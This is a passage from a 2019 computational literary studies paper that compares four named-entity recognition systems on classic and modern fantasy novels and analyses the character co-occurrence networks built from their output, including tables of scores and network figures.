89.13 55.78 68.62 83.33 57.82 68.27 87.07 87.07 87.07 84.30 69.39 76.12 Brave New World 82.93 60.71 70.00 7.50 5.36 6.25 7.69 5.36 6.32 2.63 1.79 2.13 David Copperfield⊙ 29.41 35.71 32.26 54.02 67.14 59.87 58.82 71.43 64.52 14.47 15.71 15.07 Dracula⊙ 5.00 20.00 8.00 4.00 20.00 6.67 12.50 60.00 20.69 10.53 40.00 16.67 Emma 86.96 93.02 89.89 25.90 27.91 26.87 26.81 28.68 27.72 30.22 32.56 31.34 Frankenstein⊙ 52.00 76.47 61.90 37.93 64.71 47.83 30.77 47.06 37.21 34.62 52.94 41.86 Huckleberry Finn 86.84 98.51 92.31 81.08 89.55 85.11 77.92 89.55 83.33 79.71 82.09 80.88 Dr. Jekyll and Mr. Hyde 86.36 82.61 84.44 18.18 17.39 17.78 21.74 21.74 21.74 13.64 13.04 13.33 Moby Dick⊙ 67.65 74.19 70.77 63.89 74.19 68.66 68.42 83.87 75.36 37.84 45.16 41.18 Oliver Twist 85.61 94.44 89.81 36.30 42.06 38.97 44.32 33.62 38.24 34.69 40.48 37.36 Pride and Prejudice 79.26 94.69 86.29 32.33 38.05 34.96 29.37 32.74 30.96 33.87 37.17 35.44 The Call of the Wild 80.65 30.49 44.25 86.36 46.34 60.32 89.47 82.93 86.08 88.14 63.41 73.76 The Count of Monte Cristo 78.22 89.77 83.60 67.95 60.23 63.86 79.80 89.77 84.49 72.31 53.41 61.44 The Fellowship of the Ring 73.39 72.15 72.77 66.12 68.35 67.22 56.52 38.40 45.73 63.33 56.12 59.51 The Three Musketeers 65.71 29.49 40.71 63.64 35.90 45.90 45.45 25.64 32.12 73.68 35.90 48.28 The Way We Live Now 73.33 92.77 81.91 49.52 62.65 55.32 28.18 37.35 32.12 43.30 50.60 46.67 Ulysses 76.74 94.29 84.62 70.10 97.14 81.44 71.28 95.71 81.71 72.29 85.71 78.43 Vanity Fair 67.30 65.44 66.36 32.46 34.10 33.26 32.61 34.56 33.56 53.12 47.00 49.88 Mean m 70.16 68.95 67.72 52.03 53.00 51.13 51.37 55.98 52.26 49.26 48.29 47.61 Standard Deviation s 24.03 26.27 24.25 27.27 25.24 24.93 28.68 30.16 29.17 29.70 24.71 26.50 Note: The highest scores in each column are highlighted in bold, and the lowest scores in italics. Novels written in 1st person are marked with ⊙. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 9/29 https://www.clips.uantwerpen.be/conll2002/ner/bin/conlleval.txt http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ for this. For Stanford NER and Illinois NE Tagger plain text is offered to the NER systems. As the standard deviations on the bottom rows of Tables 3 and 4 indicate, the results on the different books vary greatly. However, the different NER systems generally do perform similarly on the same novels, indicating that difficulties in recognising named entities in particular books is a characteristic of the novels rather than the systems. An exception is Brave New World on which BookNLP performs quite well, but the others underperform. Upon inspection, we find that the annotated chapter of this book contains only five different characters among which ‘The Director’ which occurs 19 times. This entity is consistently missed by the systems resulting in a high penalty. Furthermore, the ‘Mr.’ in ‘Mr. Foster’ (occurring 31 times) is often not recognised as in some NE models titles are excluded. A token-based evaluation of Illinois NE Tagger on this novel for example yields a F1-score of 51.91. The same issue is at hand with Dr. Jekyll and Mr. Hyde and Dracula. Although the main NER module in BookNLP is driven by Stanford NER, we suspect that additional domain adaptations in this package account for this performance difference. Table 4 Precision (P), Recall (R), and F1 scores of different NER systems on modern novels. Title BookNLP Stanford NER Illinois NER IXA-NERC P R F1 P R F1 P R F1 P R F1 A Game of Thrones 97.98 62.99 76.68 92.73 66.23 77.27 93.51 93.51 93.51 92.08 60.39 72.94 Assassin’s Apprentice⊙ 63.33 38.38 47.80 61.19 41.41 49.90 61.45 40.40 48.78 53.12 34.34 41.72 Elantris 82.00 89.78 85.71 76.97 92.70 84.11 83.12 97.08 89.56 76.52 64.23 69.84 Gardens of the Moon 35.29 34.29 34.78 39.02 45.71 42.11 40.43 54.29 46.34 44.44 45.71 45.07 Harry Potter 83.80 90.36 86.96 61.24 65.66 63.37 58.43 58.43 58.43 54.94 53.61 54.27 Magician 72.92 42.17 53.44 65.57 48.19 55.56 77.67 96.39 86.02 63.10 63.86 63.47 Mistborn 96.46 81.95 88.62 93.22 82.71 87.65 90.07 95.49 92.70 94.05 59.40 72.81 Prince of Thorns 69.23 62.07 65.45 64.29 62.07 63.16 60.00 51.72 55.56 72.73 55.17 62.75 Storm Front⊙ 65.00 65.00 65.00 68.42 65.00 66.67 64.71 55.00 59.46 63.16 60.00 61.54 The Black Company⊙ 77.27 96.23 85.71 29.41 9.43 14.29 67.39 58.49 62.63 60.87 26.42 36.84 The Black Prism 90.29 90.29 90.29 88.35 88.35 88.35 88.68 91.26 89.95 87.21 72.82 79.37 The Blade Itself 62.50 71.43 66.67 71.43 71.43 71.43 52.63 71.43 60.61 55.56 35.71 43.48 The Colour of Magic 83.33 37.50 51.72 84.00 52.50 64.62 71.43 25.00 37.04 77.78 35.00 48.28 The Gunslinger 64.71 100.00 78.57 64.71 100.00 78.57 61.76 95.45 75.00 59.38 86.36 70.37 The Lies of Locke Lamora 86.16 74.05 79.65 87.58 76.22 81.50 86.79 74.59 80.23 88.19 68.65 77.20 The Name of the Wind 85.88 74.49 79.78 87.36 77.55 82.16 78.82 68.37 73.22 85.92 62.24 72.19 The Painted Man 87.02 71.70 78.62 86.47 72.33 78.77 80.81 87.42 83.99 83.09 71.07 76.61 The Way of Kings 80.72 87.01 83.75 75.82 89.61 82.14 70.10 88.31 78.16 66.67 49.35 56.72 The Wheel of Time 66.67 45.86 54.34 70.93 77.71 74.16 58.05 87.26 69.72 66.67 57.32 61.64 Way of Shadows 53.85 77.78 63.64 48.72 70.37 57.58 45.45 92.59 60.98 42.86 44.44 43.64 Mean m 75.22 69.67 70.86 70.87 67.76 68.17 69.57 74.12 70.09 69.42 55.30 60.54 Standard Deviation s 15.34 20.73 15.86 17.53 20.95 18.08 15.12 21.57 16.67 15.63 15.02 13.50 Note: The highest scores in each column are highlighted in bold, and the lowest scores in italics. Novels written in 1st person are marked with ⊙. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 10/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ When comparing the F1-scores of the 1st person novels to the 3rd person novels in Tables 3 and 4, we find that the 1st person novels perform significantly worse than their 3rd person counterparts, at p < 0.01. These findings are in line with the findings of Elson, Dames & McKeown (2010). In the section ‘Discussion and Performance Boosting Options’, we delve further into particular difficulties that fiction presents NER with and showcase solutions that do not require retraining the entity models. As the BookNLP pipeline in the majority of the cases outperforms the other systems and includes coreference resolution and character clustering, we further utilise this system to create our networks. The results of the BookNLP pipeline including the coreference and clustering are presented in Table A4. One of the main differences in that table is that if popular entities are not recognised by the system they are penalised heavier because the coreferent mentions are also not recognised and linked to the correct entities. This results in scores that are generally somewhat lower, but the task that is measured is also more complex. NETWORK ANALYSIS In this section, we explain how the networks were created using the recognised named entities (subsection ‘Network Construction’), followed by an explanation of network analysis measures that we applied to compare the networks (subsection ‘Network Features’). We discuss the results of the analysis (subsection ‘Results of Network Analysis’), as well as present an exploration of the network of one novel in particular to illustrate how a visualisation of a network can highlight particular characteristics of the interactions in the selected novel (subsection ‘Network Exploration’). Network construction As explained in the section ‘Related Work’, we opt for the co-occurrence rather than the conversational method for finding the edges of our networks. The body of text that is used to define a co-occurrence differs per approach. Whereas Fernandez, Peterson & Ulmer (2015) define such a relation if characters are mentioned in the same sentence, Ardanuy & Sporleder (2014) use a paragraph for the same definition. We consider the delineation of what constitutes a paragraph to be too vague for the purpose of this study. While paragraphs are arguably better at conveying who interacts with whom, simply because of their increased length, it also brings forth an extra complexity in terms of their definition. Traditionally, paragraphs would be separated from another by means of a newline followed by an indented first line of the next paragraph. While this format holds for a part of our collection, it is not uniform. Other paragraph formats simply add vertical white space, or depend solely on the content (Bringhurst, 2004). Especially because the text files in our approach originate from different online sources— each with their own accepted format—we decided that the added ambiguity should be avoided. For this study, we therefore define that a co-occurrence relationship between two characters exists if they are mentioned in the same sentence. For a co-occurrence of more than two characters, we follow Elson, Dames & McKeown (2010). Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 11/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ That is, a multi-way co-occurrence between four characters is broken down into six bilateral co-occurrences. For the construction of each social network, the co-occurrences are translated to nodes for characters and edges for relationships between the characters. We thus create a static, undirected and weighted graph. For the weight of each edge, we follow Ardanuy & Sporleder (2014). That is, each edge is assigned a weight depending on the number of interactions between two characters. For the construction of the network, we used NetworkX (https://networkx.github.io/—v1.11) and Gephi (https://gephi.org/—v0.9.1) to visualise the networks. To ground the network analysis to be presented below, we gathered some overall statistics of the network creation process shown in Table A3 on page 23. As mentioned in the subsection ‘Annotation’, if the annotator decided that a character was definitely present, but unable to assert which character, the occurrence was marked as default. The fraction of defaults represents what portion of all identified characters was marked with default. The fraction of unidentified characters represents the percentage of characters that were not retrieved by the system, but had to be added by the annotators. Next, we present some overall statistics such as sentence length, the average number of persons in a sentence, and the average fraction of sentences that mention a person. Lastly, we kept track of the total number of annotated sentences, the total number of unique characters and character mentions. The only difference that could be identified between classes is the average sentence length, which was significant at p < 0.01. The sentences in classic books are significantly longer than in modern novels, suggesting that there is indeed some difference in writing style. However, other than that, none of the other measures differ significantly. This is useful information, as it helps support that the novels used in either class are comparable, despite their age-gap. Network features We analyse the following eight network features: (1) Average degree is the mean degree of all the nodes in the network. The degree of a node is defined as the number of other nodes the node is connected to. If the degree of a node is zero, the node is connected to no other nodes. The degree of a node in a social network is thus is measure of its social ‘activity’ (Wasserman & Faust, 1994). A high value—for example, in Ulysses—indicates that the characters interact with many different other characters. Contrarily, a low value—for example, in 1984—indicates that the characters only interact with a small number of other characters. (2) Average Weighted Degree is fairly similar to the average degree, but especially in the sense of social networks, a distinction must be made. It differs in the sense that the weighted degree takes into account the weight of each of the connecting edges. Whereas a character in our social network could have a high degree—indicating a high level of social activity—if the weights of all those connected edges are relatively small, this suggests only superficial contact. Conversely, while the degree of a character could be low—for example, the character is only connected to two other characters— the two edges could have very large weights, indicating a deep social connection Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 12/29 https://networkx.github.io/ https://gephi.org/ http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ between the characters. Newman (2006) underlines the importance of this distinction in his work on scientific collaborations. To continue the examples of Ulysses and 1984; while their average degrees are vastly different (with Ulysses being the highest of its class and 1984 the lowest), their average weighted degrees are comparable. (3) Average Path Length is the mean of all the possible shortest paths between each node in the network; also known as the geodesic distance. If there is no path connecting two nodes, this distance is infinite and the two nodes are part of different graph components (see item 7, Connected Components). The shortest path between two nodes can be found by using Dijkstra’s algorithm (Dijkstra, 1959). The path length is typically an indication of how efficiently information is relayed through the network. A network with a low path length would indicate that the people in the network can reach each other through a relatively small number of steps. (4) Network Diameter is the longest possible distance between two nodes in the network. It is in essence the longest, shortest path that can be found between any two nodes in the network, and is indicative of the linear size of the network (Wasserman & Faust, 1994). (5) Graph density is the fraction of edges compared to the total number of possible edges. It thus indicates how complete the network is, where completeness would constitute all nodes being directly connected by an edge. This is often used in social network analysis to represent how closely the participants of the network are connected (Scott, 2012). (6) Modularity is used to represent community structure. The modularity of a network is ‘...the number of edges falling within groups minus the expected number in an equivalent network with edges placed at random’ (Newman, 2006). Newman shows modularity can be used as an optimisation metric to approximate the number of community structures found in the network. To identify the community structures, we used the Louvain algorithm (Blondel et al., 2008). The identification of community structures in graph is useful, because the nodes in the same community are more likely to have other properties in common (Danon et al., 2005). It would therefore be interesting to see if differences can be observed between the prevalence of communities between the classic and modern novels. (7) Connected components are the number of distinct graph compartments. That is, a graph component is a subgraph in which any two vertices are connected to each other by paths, and which is connected to no additional vertices in the supergraph. In other words, it is not possible to traverse from one component to another. In most social communities, one ‘giant component’ can typically be identified, which contains the majority of all vertices (Kumar, Novak & Tomkins, 2010). A higher number of connected components would indicate a higher number of isolated communities. This is different from modularity in the sense that components are more strict. If only a single edge goes out from a subgraph to the supergraph, it is no longer considered a separate component. Modularity attempts to identify those communities that are basically ‘almost’ separate components. (8) Average clustering coefficient is the mean of all clustering coefficients. The clustering coefficient of a node can perhaps best be described as ‘all-my-neighbours-know-each-other’. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 13/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Social networks with a high clustering coefficient (and low average path length) may exhibit small world (https://en.wikipedia.org/wiki/Smallworld_experiment) properties (Watts & Strogatz, 1998). The small world phenomenon was originally described by Stanley Milgram in his perennial work on social networks (Travers & Milgram, 1967). Results of network analysis To answer our second research question, we compared the network features presented in the subsection ‘Network Features’ for the social networks of the two different sets of novels. Table A5 on page 25 shows the results. The most striking feature of these results is the wide variance across social networks on all these network measures for both the classic and the modern novels. The size of these network ranges from just 10 nodes to networks more than 50 times as large. The network size alone can also explain at least a large part of the differences in graph density, diameter, and average path length, but also average degree and clustering coefficient show wide variation. While we can observe large variation overall, there is no clear difference between the two classes, that is, between classic and modern novels. None of the evaluated network features differ significantly between these classes. Graph density is the feature that comes closest to being significant (p = 0.09), with our classic novels on average exhibiting denser networks than the modern ones. In order to better interpret these values, and in order to find out whether this variance in network features is by itself a characteristic property of social networks exposed in novels, or whether this is true for social networks in general, we need a point for comparison. For that purpose, we compare our network results to metrics that have been reported for other social network in the literature. Table 5 shows 10 such networks for comparison, including three small networks on karate club members, football players, and email users (Telesford et al., 2011), three medium-sized networks of mathematicians, a larger group of email users, and actors (Boccaletti et al., 2006), and four large networks of online platforms (Mislove et al., 2007). We can see that social networks reported elsewhere exhibit a wide variation as well, showing (unsurprisingly) an even much wider range for the network size, with the reported online social networks reaching millions of nodes. Our networks from novels are on the lower end of the size range, with the smallest ones being smaller than the smallest network of our comparison set (Karate). This directly explains why the path lengths are also on the lower end of the range, but with a considerable overlap. With respect to the average degree, our novel networks are covered by the range given by these comparison networks, with even the outliers of our dataset being less extreme than the most extreme cases of the comparison networks. The same holds for the clustering coefficient, except for the outlier for a very small network with a clustering coefficient of 0 (Alice in Wonderland). In summary, we can say that social networks from novels appear to be no different than social networks in general in showing a high variation in basically all network features across different networks. While networks differ much individually, there is no significant fundamental difference between classic and modern novels. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 14/29 https://en.wikipedia.org/wiki/Smallworld_experiment http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ Network exploration In addition to the formal analysis above, we show here a more informal exploration of one of the networks in order to give a more intuitive explanation of our results. For that purpose, we selected the largest network of the modern novels, which is A Game of Thrones. A visualisation of that network is shown in Fig. 1. We see that it is a quite dense network with many connections (it has the highest average degree of all modern novels; see Table A5) and a complex structure. Despite this complexity, the relationship between the main characters of this novel can easily be identified from this visualisation, and one can clearly identify social clusters. Such informal visual explorations should then of course be substantiated with formal analyses, that is, by ranking the edges of the network by their weights and by applying a clustering algorithm in the case of the two given examples. As the readers of this novel might have already spotted, Dany resides in a completely different part of the world in this novel, which explains her distance from rest of the network. Moreover, in A Game of Thrones, this character does not at any point physically interact with any of the characters in the larger cluster. This highlights a caveat of the use of co-occurrence networks over conversational networks. The character Dany does not truly interact with the characters of this main cluster, but is rather name- dropped in conversations between characters in that cluster. Her character ‘co-occurs’ with the characters that drop her name and edges are created to represent that. To stick with the example of Dany, we can also identify two seemingly separate characters, Dany and Daenerys Targaryen in Fig. 1. These names actually refer to the same entity. As mentioned in the section ‘Related Work’, this issue may be addressed by creating Table 5 Comparison to other social networks. Network via Nodes Average degree Clustering coefficient Average path length Karate Telesford et al. (2011) 35† 4.46 0.55 2.41† Football Telesford et al. (2011) 115 10.66 0.40 2.51 E-mail Telesford et al. (2011) 1,133 9.62 0.22 3.60 Math1999 Boccaletti et al. (2006) 58,516 5.00 0.15 8.46⋄ e-mail Boccaletti et al. (2006) 59,812 2.88 0.03† 4.95 Actors Boccaletti et al. (2006) 225,226 61.00⋄ 0.79⋄ 3.65 YouTube Mislove et al. (2007) 1,157,827 1.81 0.14 5.10 Flickr Mislove et al. (2007) 1,846,198 1.76 0.31 5.67 Orkut Mislove et al. (2007) 3,072,441 1.50† 0.17 4.25 LiveJournal Mislove et al. (2007) 5,284,457⋄ 1.62 0.33 5.88 maximum 522 15.77 0.81 3.33 Classic novels mean 106 6.14 0.60 2.49 minimum 10 1.66 0.00 1.53 maximum 314 10.50 0.75 4.06 Modern novels mean 99 5.50 0.56 2.68 minimum 27 3.00 0.42 2.22 Notes: The highest scores in each column are highlighted with a ⋄ and the lowest scores with a † for the comparison networks. Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 15/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ a list of aliases for each character. Some online sources exist that can help expedite this process, but we would argue these sources are not applicable to our modern novels. Whereas 19th century novels typically have characters with more traditional names such as Elizabeth Bennet, modern fantasy novels have unconventional names such as Daenerys Targaryan. External sources such as on metaCPAN3 can help to connect Elizabeth to nicknames such as Lizzy, but there are no sources that can do this for Daenerys and Dany. Even if there was such a source, the question remains whether if it is desirable to collapse those characters. Especially in A Game of Thrones, the mentions of Dany and Daenerys Targaryen occur in entirely different contexts. Whereas references to Dany occur in an environment that is largely friendly towards her; her formal name of Daenerys Targaryen is mostly used by her enemies (in her absence). Rather than simply collapsing the two characters as one, it might be useful to be able to retain that distinction. This is a design choice that will depend on the type of research question one wants to answer by analysing the social networks. DISCUSSION AND PERFORMANCE BOOSTING OPTIONS In analysing the output of the different NER systems, we found that some types of characters were particularly difficult to recognise. Firstly, we found a number of Joseth Harys Ser Lord Robb Cohollo Piper Ser Marq Hullen Tommen Prince Trant Meryn Ser Lord Vance Dareon Arya Horseface Lord Hornwood Robert Baratheon Caron Lord Bryce Elia Stark Sansa Mott Master Aggo Thoros Lyanna Ser Donnel Nymeria Sherrer Tarly Sam Jhiqui Alyssa Arryn Jyck Yoren Frey Lady Rayder Mance Pyp Manderly Ser Wylis Chella Jhogo Chiggen Dontos Ser Bronze Yohn Royce Chett Visenya Cassel Jory Grenn Lord Slynt Hal Mollen Ned Stark Stark Brandon Mikken Greyjoy Balon Morrec Tomard Danwell Mya Stone Heartsbane Jaremy Ser Rykker Egen Ser Vardis Castle Black Lord Dondarrion Beric Brynden Blackfish Maester Luwin Maester Aemon Craven Mord Matt Clegane Sandor Shae Harrenhal Lord Nestor Royce Pentoshi Toad Porther Lord lord Tyrion Mago Vargo Hoat Rickon Eroeh Lord Arryn Quaro Lord Piper Braavosi Matthar Bracken Jonos Lord Lord Steward Manderly Ser Wendel Tregar Timett Santagar Ser Aron Barristan Selmy Ser Payne Ser Ilyn Perwyn Ser Lord Mallister Jason Samwell Tarly Poole Vayon Jofftey Beth Gared Moreo Whent Oswell Ser Forel Syrio Dany Kurleket Greatjon Lannister Tyrion Ser Moore Mandon Hardin Dorne Lord Jon Stannis Baratheon Lord Jeren Ulf Moat Cailin Cassel Martyn Alliser Ser Thorne Farlen Lord Robert Lys Lord Rowan Jeyne Poole Tyroshi Conn Maegor Haggo Vale Edmure Ser Tully Highgarden Gage Hill Horn Coratt Maege Mormont Lady Catelyn Stark Cayn Ben Stark Marillion Lady Mormont King Robert Arryn Gendry Xho Jalabhar Khaleesi Lord Baratheon Renly Alyn Lord Baelish Petyr Lady Sansa Mirri Maz Duur Lord Frey Walder Father Ser Addam Marbrand Hugh Ser Old Nan Lharys Jacks Rhaegar Targaryen Joffrey Prince Boros Ser Blount Vance Karyl Joff Mordane Septa Ser Tallhart Helman Lord Tytos Blackwood Tywin Lord Lannister Yi Ti Jen Ben Halder Shagga Arryn Jon Dolf Baelor Gunthor Lannister Ser Kevan Stevron Frey Ser Tanda Lady Raymun Darry Ser Shaggydog Lord Tully Hoster Arys Ser Flowers Jafer Willis Ser Wode Dawn Heward Willem Darry Fogo Malleon Will Rhaggat Khal Mycah Jaggot Flement Brax Ser Umar Robar Ser Naerys Cheyk Tobho Mott Benjen Stark Mohor Littlefinger Lord Tyrell Brynden Ser Tully Hali Myrcella Stiv Othell Yarwyck Greyjoy Theon Irri Maester Pycelle Grey Wind Quorin Halfhand Jaehaerys Lord Cerwyn Clydas Rakharo Dywen Magister Illyrio Torrhen Aegon Targaryen Bowen Marsh Daryn Hornwood Riverrun Clegane Gregor Ser Snow Jon Rast Aerys Targaryen Drogo Khal Viserys Targaryen Qotho Whent Lady Hobb Three-Finger Dothraki Royce Ser Andar Karyl Ser Hake Lance Hosteen Mace Tyrell Lord Hunter Hallis Mollen Dothrak Vaes Daeren Targaryen Lord Lefford Volantis Glover Galbart Rhaego Bolton Roose Catelyn Tully Lannister Cersei Joss Waymar Ser Royce Lothor Brune Lord Tarly Randyll Derik Lord Jared Frey Ser Tyrosh Ser Swann Balon Lord Varys Bran Harrion Karstark Jhaqo Doreah Haider bush Janos Slynt Brothers Moon Arya Stark Daenerys Targaryen Corbray Lyn Ser Hodor Robett Glover Harwin Arbor Lord Karstark Rickard Bronn Hobber Ser Khal Jommo Horas Ser Lord Mormont Desmond Starks Robb Stark Lord Hand lord Albett Noye Donal Jorah Ser Mormont Figure 1 Social network of G.R.R. Martin’s A Game of Thrones. Full-size DOI: 10.7717/peerj-cs.189/fig-1 3 MetaCPAN is a search engine for Perl code and documentation: https:// metacpan.org/source/BRIANL/Lingua- EN-Nickname-1.14/nicknames.txt (last retrieved: 30 October 2017). Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 16/29 http://dx.doi.org/10.7717/peerj-cs.189/fig-1 https://metacpan.org/source/BRIANL/Lingua-EN-Nickname-1.14/nicknames.txt https://metacpan.org/source/BRIANL/Lingua-EN-Nickname-1.14/nicknames.txt https://metacpan.org/source/BRIANL/Lingua-EN-Nickname-1.14/nicknames.txt http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ unidentified names that are so called word names (i.e. terms that also occur in dictionaries, for example to denote nouns such as Grace or Rebel). We suspected that this might hinder the NER, which is why we collected all such names in our corpus in Table A1 on page 21, and highlighted such word names with a †. This table shows that approximately 50% of all unidentified names in our entire corpus consist at least partially of a word name, which underpins that this issue is potentially widely spread. In order to verify this, we replaced all potentially problematic names in the source material by generic English names. We made sure not to add names that were already assigned to other characters in the novel, and we ensured that these names were not also regular nouns. An example of these changed character names can be found in Table 6, which shows all names affected for The Black Company. Secondly, we noticed that persons with special characters in their names can prove difficult to retrieve. For example, names such as d’Artagnan in The Three Musketeers or Shai’Tan in The Wheel of Time were hard to recognise for the systems. To test this, we replaced all names in our corpus such as d’Artagnan or Shai’Tan with Dartagnan and Shaitan. By applying these transformations to our corpus, we found that the performances could be improved, uncovering some of the issues that plague NER. As can be observed in Fig. 2, not all of the novels were affected by these transformations. Out of the 40 novels used in this study, we were able to improve the performance for 14. While the issue of the apostrophed affix was not as recurrent in our corpus as the real-word names, its impact on performance is troublesome nonetheless. Clearly, two novels are more affected by these transformations than the others, namely: The Black Company and the The Three Musketeers. To further sketch these issues, we delve a bit deeper into these two specific novels. These name transformations show that the real-word names and names with special characters were indeed problematic and put forth a problem for future studies to tackle. As illustrated by Fig. 2, the aforementioned issues are also present in the classic novels typically used by related works (such as The Three Musketeers). This begs the question of the scope of these problems. To the best of our knowledge, similar works have not identified this issue to affect their performances, but we have shown that with a relatively simple workaround, the performance can be drastically improved. It would thus be interesting to evaluate how much these studies suffer from the same issue. Lastly, as Table 6 Unidentified names in The Black Company replaced by generic English names. Original Adjusted Blue Richard Croaker Thomas Curly Daniel Dancing Edward Mercy Charles One-Eye Timothy Silent James Walleye William Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 17/29 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ manually replacing names is clearly far from ideal, we would like to encourage future work to find a more robust approach to resolve this issue. The Black Company This fantasy novel describes the dealings of an elite mercenary unit—The Black Company— and its members, all of which go by code names such as the ones in Table 6. With a preliminary F1-score of 06.85 (see Table A4), The Black Company did not do very well. We found this book had the highest percentage of unidentified characters of our collection. Out of the 14 characters found by our annotators, only five were identified by the pipeline. Interestingly enough, eight out of the nine unidentified characters in this novel have names that correspond to regular nouns. By applying our name transformation alone, the F1-score rose from 06.85 to the highest in our collection to 90.00. The Three Musketeers This classic piece recounts the adventures of a young man named d’Artagnan, after he leaves home to join the Musketeers of the Guard. With an F1-score of 13.91 (see Table A4), The Three Musketeers performs the second worst of our corpus, and the worst in its class. By simply replacing names such as d’Artagnan with Dartagnan the F1-score rose Figure 2 Effect of transformations on all affected classic and modern novels in F1-score in using the BookNLP pipeline (includes co-reference resolution). Full-size DOI: 10.7717/peerj-cs.189/fig-2 Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 18/29 http://dx.doi.org/10.7717/peerj-cs.189/fig-2 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ from 13.91 to 53, suggesting that the apostrophed name was indeed the main issue. To visualise this, we have included figures of both The Three Musketeer networks—before and after the fix—in Figs. 3 and 4. As can be observed in Fig. 3, the main character of the novel is hardly represented in this network, which is not indicative of the actual story. The importance of resolving the issue of apostrophed named is made clear in Fig. 4, where the main character is properly represented. Chalais M. Bonacieux de M. Busigny Houdiniere La John Felton Bois-Tracy de Ma... de M. Schomberg Lubin Porthos Monsieur la Harpe de Rue Rochellais Richelieu de de Busigny Monsi... Milady Clarik Rochefort Grimaud Monsieur M. Coquenard de Treville Mons... Mr. Felton Montague dâArtagnan Mon... Buckingham de Mo... de Monsieur Voit... Monsieur Bernajo... III Henry Monsieur Dessess... de Chevreuse Mad... Donna Estafania Lord Duke Quixote Don Lorme de Marion de Cahusac Monsi... Bazin Chevalier Monsie... Musketeer Constance Bonaci... M. Dessessart Germain de M. Cavois Judith Gascon Mousqueton Monsieur Athos Duke Monsieur Charlotte Backson Bethune Planchet Monsieur Louis XIII Bonacieux Madame de Benserade Mon... Gervais Meung Chesnaye La Bonacieux Monsie... Chrysostom Wardes de De M. Coquenard Monsie... Patrick Berry Mande Laporte M. de M. Laffemas Laporte Monsieur Louis XIV Anne de M. Tremouille... Norman de M. Bassompier... IV Henry Villiers George Bearnais I Charles Pierre monsieur Aramis ... Jussac Denis Gascons Coquenard Madame Crevecoeur Picard pope Pope de M. Treville de Marie Medicis Lorraine #N/A Cardinal Monsieur Fourreau Bicarat Marie Michon MAR... Lord de Winter ii Milady de De Win... M. dâArtagnan Duke Messieurs Porthos Kitty Figure 3 Social network of The Three Musketeers without adjustment for apostrophed names. Full-size DOI: 10.7717/peerj-cs.189/fig-3 M. Bonacieux de M. Busigny Houdiniere La John Felton de M. Schomberg Porthos Monsieur la Harpe de Rue Rochellais de Marie Medicis Milady Clarik Grimaud Monsieur de Treville Mons... Commissary Monsi... Mr. Felton Montague Buckingham de Mo... de Monsieur Voit... Monsieur Bernajo... III Henry Monsieur Dessess... de Chevreuse Mad... Donna Estafania Lord Duke Quixote Don de Cahusac Monsi... Chevalier Monsie... Musketeer M. Dessessart Germain de M. Cavois Judith Monsieur Dartagn... Mousqueton Monsieur Athos Duke Monsieur Charlotte Backson Bethune Planchet Monsieur Louis XIII Milady de Winter Bonacieux Madame de Benserade Mon... Gervais Meung Chesnaye La Bonacieux Monsie... Chrysostom Wardes de De M. Coquenard Monsie... Patrick Lord de De Winter Berry Mande Laporte M. Richelieu de Godeau Laporte Monsieur Louis XIV Anne de M. Tremouille... Norman de M. Bassompier... IV Henry Villiers George de M. Laffemas Bearnais Pierre monsieur Aramis ... Jussac Denis Gascons Crevecoeur Picard pope Pope de M. Treville de Monsieur Cavo... Lorraine Dangouleme Duc #N/A Cardinal Monsieur Fourreau Bicarat Marie Michon MAR... I Charles Duke Villeroy Messieurs Porthos Kitty Bonacieux Consta... Figure 4 Social network of The Three Musketeers with adjustment for apostrophed names. Full-size DOI: 10.7717/peerj-cs.189/fig-4 Dekker et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.189 19/29 http://dx.doi.org/10.7717/peerj-cs.189/fig-3 http://dx.doi.org/10.7717/peerj-cs.189/fig-4 http://dx.doi.org/10.7717/peerj-cs.189 https://peerj.com/computer-science/ CONCLUSION AND FUTURE WORK In this study, we set out to close a gap in the literature when it comes to the evaluation of NER for the creation of social networks from fiction literature. In our exploration of related work, we found no other studies that attempt to compare networks from classic and modern fiction. To fill this gap, we attempted to answer the following two research questions: � To what extent are off-the-shelf NER tools suitable for identifying fictional characters in novels? � Which differences or similarities can be discovered between social networks extracted for different novels? To answer our primary research question, we evaluated four state-of-the-art NER systems on 20 classic and 20 modern science fiction/fantasy novels. In our study, we found no significant difference in performance of the named entity recognisers on classic novels and modern novels. We did find that novels written in 3rd person perspective perform significantly better than those written in 1st person, which is in line with findings in related studies. In addition, we observed a large amount of variance within each class, even despite our limitation for the modern novels to the fantasy/science fiction genre. We also identified some recurring problems that hindered NER. We delved deeper into two such problematic novels, and find two main issues that overarch both classes. Firstly, we found that word names such as Mercy are more difficult to identify to the systems. We showed that replacing problematic word names by generic placeholders can increase performance on affected novels. Secondly, we found that apostrophed names such as d’Artagnan also prove difficult to automatically identify. With fairly simple methods that capture some cultural background knowledge, we circumvented the above two issues to drastically increase the performance of the used pipeline. To the best of our knowledge, none of the related studies discussed in the section ‘Related Work’ acknowledge the presence of these issues. We would thus like to encourage future work to evaluate the impact of these two issues on existing studies, and call to develop a more robust approach to tackle them in future studies. To answer our secondary research question, we created social networks for each of the novels in our collection and calculated several networks features with which we compared the two classes. As with the NER experiments, no major differences were found 